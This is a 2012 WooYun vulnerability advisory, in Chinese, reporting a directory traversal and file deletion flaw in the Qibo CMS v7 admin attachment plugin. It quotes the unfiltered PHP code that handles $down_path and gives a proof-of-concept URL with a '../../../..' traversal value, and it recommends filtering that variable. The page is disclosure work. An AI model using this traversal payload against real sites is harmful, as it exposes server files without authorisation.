当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2012-05946

漏洞标题: 齐博cms整站系统v7后台目录遍历及文件删除漏洞

相关厂商: 齐博cms整站系统

漏洞作者: 猪头子

提交时间: 2012-04-11 13:45

公开时间: 2012-05-26 13:45

漏洞类型: 任意文件遍历/下载

危害等级: 中

自评Rank: 9

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-04-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

在后台对变量过滤不严导致任意文件遍历和删除

详细说明:

程序未对用户提交的$down_path参数进行任何过滤,导致用户可以遍历程序目录。在hack/attachment/admin.php第36行

code 区域
elseif($job=="list"&&$Apower[attachment_list]){
!$page&&$page=1;
$rows=40;
$min=($page-1)*$rows;
$down_path || $down_path=$webdb[updir];

$up_path=preg_replace("/(.*)\/([^\/]+)/is","\\1",$down_path);

$thispath=ROOT_PATH.$down_path;
//直接将$down_path带入get_file()
$file_db=get_file($down_path);

漏洞证明:

在hack/attachment/admin.php第36行

code 区域
elseif($job=="list"&&$Apower[attachment_list]){
!$page&&$page=1;
$rows=40;
$min=($page-1)*$rows;
$down_path || $down_path=$webdb[updir];

$up_path=preg_replace("/(.*)\/([^\/]+)/is","\\1",$down_path);

$thispath=ROOT_PATH.$down_path;
//直接将$down_path带入get_file()
$file_db=get_file($down_path);





进后台,在插件管理里面找到附件管理,然后构造如下$down_path

http://**.**.**.**/admin/index.php?lfj=attachment&job=list&down_path=../../../..





修复方案:

过滤$down_path变量。。

版权声明:转载请注明来源 猪头子@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2012-04-11 15:06 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)
    0

    关注一下,期待公开日...

登录后才能发表评论,请先 登录